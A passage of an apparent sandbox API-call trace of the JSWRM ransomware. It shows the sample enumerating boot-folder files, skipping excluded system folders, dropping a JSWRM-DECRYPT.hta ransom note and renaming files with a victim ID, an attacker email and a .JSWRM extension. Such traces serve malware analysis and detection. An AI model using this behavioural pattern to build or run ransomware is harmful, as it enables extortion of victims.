[0064.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.251] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf23e2f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf23e2f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.251] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.251] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2=".") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="..") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="...") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="windows") returned -1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="recovery") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="perflogs") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="documents and settings") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="$RECYCLE.BIN") returned 1 [0064.251] lstrcmpiW (lpString1="ro-RO", lpString2="system volume information") returned -1 [0064.252] lstrcmpiW (lpString1="ro-RO", lpString2="msocache") returned 1 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.252] GetFileAttributesW (lpFileName="C:\\Boot\\ro-RO\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ro-ro\\jswrm-decrypt.hta")) returned 0xffffffff [0064.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.252] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ro-ro\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.252] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.252] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.253] CloseHandle (hObject=0x450) returned 1 [0064.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0064.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.254] GetFileAttributesW (lpFileName="C:\\Boot\\ro-RO\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ro-ro\\jswrm-decrypt.hta")) returned 0x20 [0064.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0064.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.254] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0064.254] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.254] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.254] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.254] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.254] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.255] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.255] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.255] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.258] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.258] CloseHandle (hObject=0xffffffff) returned 1 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0064.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226930 [0064.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0064.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226930 | out: hHeap=0x1e0000) returned 1 [0064.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.258] MoveFileW (lpExistingFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.259] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf4a07f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf4a07f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0064.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0064.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.259] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf4a07f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf4a07f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.260] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0064.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.260] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2=".") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="..") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="...") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="windows") returned -1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="recovery") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="perflogs") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="documents and settings") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="$RECYCLE.BIN") returned 1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="system volume information") returned -1 [0064.260] lstrcmpiW (lpString1="ru-RU", lpString2="msocache") returned 1 [0064.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236db8 [0064.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.260] GetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ru-ru\\jswrm-decrypt.hta")) returned 0xffffffff [0064.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236db8 | out: hHeap=0x1e0000) returned 1 [0064.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.261] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ru-ru\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.261] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.261] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.263] CloseHandle (hObject=0x450) returned 1 [0064.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: 